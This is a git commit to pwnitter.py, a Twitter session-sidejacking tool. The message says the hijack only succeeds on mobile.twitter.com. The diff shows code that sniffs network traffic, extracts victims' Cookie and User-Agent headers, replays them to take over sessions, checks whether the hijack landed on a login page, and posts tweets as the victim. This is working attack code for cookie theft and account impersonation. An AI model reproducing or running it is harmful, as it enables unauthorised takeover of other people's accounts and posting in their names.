Used the Useragent from the sniffed client

But that doesn't help it. For some reason we seem to not be able to sidejack everything but mobile.twitter.com. I thought they take the UserAgent into account, but that doesn't seem to be it.
Anyway, I leave it at that. Maybe I'll have an idea later.

diff --git a/pwnitter.py b/pwnitter.py
index c363a23..a007b0b 100755 (executable)
--- a/pwnitter.py
+++ b/pwnitter.py
@@ -118,17 +118,25 @@ class Pwnitter(dbus.service.Object):
 
             hostMatches = re.search('Host: ((?:api|mobile|www)?\.?twitter\.com)', data)
             if hostMatches:
-                log.debug('Host matched')
                 host = hostMatches.group(1)
-
+                log.debug('Host matched %s', host)
+                
+                user_agent_matches = re.search('User-Agent: ([^\n]+)', data)
+                if user_agent_matches:
+                    user_agent = user_agent_matches.group(1)
+                    log.debug('Found UserAgent: %s', user_agent)
+                else:
+                    user_agent = "Mozilla/5.0"
+                
                 cookieMatches = re.search('Cookie: ([^\n]+)', data)
                 log.debug('CookieMatches? %r', cookieMatches)
+                
                 if cookieMatches:
                     cookie = cookieMatches.group(1)
                     log.debug('yummie Cookie %r', cookie)
 
                     headers = {
-                        "User-Agent": "Mozilla/5.0",
+                        "User-Agent": user_agent,
                         "Cookie": cookie,
                     }
                     
@@ -138,6 +146,9 @@ class Pwnitter(dbus.service.Object):
                         log.error(e)
                     else:
                         log.debug('Connected to host %s', host)
+                        #log.debug("%s", page)
+                        if '''<p id="signup-btn"><a href="/signup" id="signup_submit"''' in page:
+                            log.info('Login in Page :-(')
 
                         # Newtwitter and Oldtwitter have different formatting, so be lax
                         authToken = ''
@@ -208,10 +219,13 @@ class Pwnitter(dbus.service.Object):
                                 # 403 is a dupe tweet
                                 if response.status != 403:
                                     log.info("Successfully tweeted as %s", name)
+
                                     if tweeted_callback:
                                         tweeted_callback(name)
                                 else:
                                     log.info('Already tweeted as %s', name)
+                                log.debug("%s, %s", response.status, response.reason)
+                                log.debug("%s", response.read())                            
 
                             else: